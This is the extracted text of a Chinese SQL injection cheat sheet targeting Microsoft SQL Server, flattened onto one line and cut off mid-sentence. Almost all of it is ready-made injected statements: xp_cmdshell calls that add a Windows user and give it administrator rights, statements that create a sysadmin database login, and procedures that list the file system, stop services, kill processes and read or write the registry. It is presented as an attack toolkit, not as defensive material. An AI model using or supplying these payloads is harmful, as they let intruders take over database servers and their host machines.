sql_dbo注入语句大全.pdf

sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = x and name = xp_cmdshell) --用xp_cmdshell执行命令 ;exec master..xp_cmdshell net user name password /add-- ;exec master..xp_cmdshell net localgroup name administrators /add-- --查看权限 and (select IS_SRVROLEMEMBER(sysadmin))=1-- //sa and (select IS_MEMBER(db_owner))=1-- // dbo and (select IS_MEMBER(public))=1-- //public --创建个登陆mssql 的帐号 ;exec master.dbo.sp_addlogin name,pass;-- --把创建的mssql登陆帐号提升到sysadmin ;exec master.dbo.sp_addsrvrolemember name,sysadmin;-- 有用的扩展 --获得MS SQL的版本号 //mssql版本 execute master..sp_msgetversion // dbo public --得到硬盘文件信息 //dbo public --参数说明: 目录名, 目录深度,是否显示文件 //读取磁盘目录和文件 execute master..xp_dirtree c: //列出所有c:\文件和目录,子目录 execute master..xp_dirtree c:,1 //只列c:\文件夹 execute master..xp_dirtree c:,1,1 //列c:\文件夹加文件 --列出服务器上所有windows本地组 execute master..xp_enumgroups //dbo --得到当前sql server服务器的计算机名称 //获得计算机名 execute master..xp_getnetname //dbo public --列出指定目录的所有下一级子目录 EXEC [master].[dbo].[xp_subdirs] c:\WINNT //可以列目录 --列出服务器上固定驱动器,以及每个驱动器的可用空间 execute master..xp_fixeddrives //dbo public --显示系统上可用的盘符 execute master..xp_availablemedia //dbo --获取某文件的相关属性 execute master..xp_getfiledetails C:1.txt //dbo public --统计数据库里每个表的详细情况 exec sp_MSforeachtable sp_spaceused ? //查询表 //dbo public --获得每个表的记录数和容量 exec sp_MSforeachtable select ?,?, sp_spaceused ?, SELECT count(*) FROM ? //dbo pubilc --更新Table1/Table2 中note列为NULL的值 sp_MSforeachtable Update ? Set note= Where note is null,null,null,null, AND in (Table1,Table2) --列出服务器域名 xp_ntsec_enumdomains //机器名 //dbo public --停止或者启动某个服务 xp_servicecontrol stop,schedule //schedule是服务得名称 //dbo --用pid来停止某个执行中的程序 xp_terminate_process 123 //123是pid //dbo --只列某个目录下的子目录 dbo.xp_subdirs C: //dbo --服务器安全模式信息 xp_loginconfig //dbo xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite --将新扩展存储过程的名称注册到 M